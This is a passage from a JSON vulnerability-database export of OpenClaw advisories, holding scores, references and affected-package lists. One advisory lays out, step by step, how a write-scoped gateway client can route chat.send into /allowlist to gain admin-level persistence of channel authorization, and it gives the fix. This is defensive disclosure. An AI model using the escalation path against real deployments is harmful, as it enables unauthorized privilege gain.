"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/2c45b06afdd6f7c621038b5419d8e661cff34a7f" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-846p-hgpv-vphc", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-846p-hgpv-vphc" }, { "reference_url": "https://github.com/advisories/GHSA-846p-hgpv-vphc", "reference_id": "GHSA-846p-hgpv-vphc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-846p-hgpv-vphc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "GHSA-846p-hgpv-vphc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p7v5-jqhq-nbhz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89625?format=api", "vulnerability_id": "VCID-p8xd-2um4-9ufr", "summary": "OpenClaw: Assistant media route missed scope enforcement for trusted-proxy authorization\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe Control UI assistant-media route authenticated trusted-proxy callers but did not enforce the declared operator scopes for identity-bearing HTTP auth paths. A trusted-proxy caller without `operator.read` could access assistant-media files and metadata that were otherwise inside allowed media roots.\n\nThe route still required successful gateway authentication and media-root checks. Severity is low.\n\n## Fix\n\nAssistant-media file and metadata requests now require `operator.read` on identity-bearing HTTP auth paths.\n\nFix commit:\n\n- `99ef3a63c58440d53f8e45ad861b846032fcb036`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41908", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11147", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11181", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11188", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41908" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/99ef3a63c58440d53f8e45ad861b846032fcb036", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/99ef3a63c58440d53f8e45ad861b846032fcb036" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8qf-fr4g-28p2", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8qf-fr4g-28p2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41908", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41908" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-scope-enforcement-bypass-in-assistant-media-route", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-scope-enforcement-bypass-in-assistant-media-route" }, { "reference_url": "https://github.com/advisories/GHSA-v8qf-fr4g-28p2", "reference_id": "GHSA-v8qf-fr4g-28p2", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v8qf-fr4g-28p2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "CVE-2026-41908", "GHSA-v8qf-fr4g-28p2" ], "risk_score": 1.9, "exploitability": "0.5", "weighted_severity": "3.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p8xd-2um4-9ufr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91065?format=api", "vulnerability_id": "VCID-pa1f-qzsh-efa9", "summary": "OpenClaw: Gateway operator.write Can Reach Admin-Class Channel Allowlist Persistence via chat.send\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n## Summary\n\nThe shared `/allowlist` command persists channel authorization config through `writeConfigFile(...)` but does not re-validate gateway client scopes for internal gateway callers. Because `chat.send` is intentionally reachable to `operator.write` callers and still creates a generic command-authorized internal context, an authenticated write-scoped gateway client can indirectly mutate channel `allowFrom` and `groupAllowFrom` policy that direct `config.patch` correctly reserves to `operator.admin`.\n\nThis is not just a generic code smell. The current code already shows the intended boundary by adding sink-side internal admin checks to shared `/config` and `/plugins` writes, but `/allowlist` was left behind.\n\n## Details\n\nThe gateway's documented scope split is clear:\n\n- `chat.send` is a write-scoped action.\n- direct config mutation is an admin-scoped action.\n\nThe vulnerable path is:\n\n1. A gateway client authenticates with `operator.write`.\n2. The client calls `chat.send`, which is intentionally allowed for that scope.\n3. `chat.send` builds an internal message context with `CommandAuthorized: true` and carries `GatewayClientScopes` into the reply pipeline.\n4. `resolveCommandAuthorization(...)` converts that internal message into `isAuthorizedSender=true` in the common case where no stricter `commands.allowFrom` override is configured.\n5. `/allowlist add|remove` accepts that generic command authorization and proceeds into its config-backed edit path.\n6. The handler clones the parsed config, calls `plugin.allowlist.applyConfigEdit(...)`, validates the result, and persists it with `writeConfigFile(validated.config)`.\n7. No sink-side check requires `operator.admin` before the persistent write occurs.\n\nThat creates a direct control-plane mismatch:\n\n- `config.patch` rejects the same caller with `missing scope: operator.admin`.\n- `/allowlist add dm ...` or `/allowlist add group ...` reached through `chat.send` can still rewrite channel authorization state.\n\n## Impact\n\n- A gateway client intentionally limited to `operator.write` can persist first-party channel authorization policy.\n- The caller can widen DM or group allowlists for channels using the shared `/allowlist` plumbing.\n- This weakens the repo's documented control-plane privilege split between ordinary write actions and admin-only persistent authorization mutation.\n\n## Remediation\n\n### 1) Add the Missing Sink-Side Internal Admin Check to `/allowlist`\n\nMirror the existing hardened pattern from `/config` and `/plugins`.\n\nBefore any config-backed `/allowlist add|remove` write, require:\n\n- `operator.admin` for internal gateway channels\n\nThis should happen before `plugin.allowlist.applyConfigEdit(...)` and before `writeConfigFile(...)`.\n\n### 2) Keep Pairing-Store and Config-Write Policy Checks, but Do Not Treat Them as Scope Enforcement\n\n`configWrites` policy and pairing-store behavior are useful secondary controls, but they do not replace the missing privilege check between `operator.write` and `operator.admin`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35621", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.1167", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11631", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11665", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35621" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:21:07Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35621", "reference_id": "CVE-2026-35621", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35621" }, { "reference_url": "https://github.com/advisories/GHSA-94pw-c6m8-p9p9", "reference_id": "GHSA-94pw-c6m8-p9p9", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-94pw-c6m8-p9p9" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence", "reference_id": "openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:21:07Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": 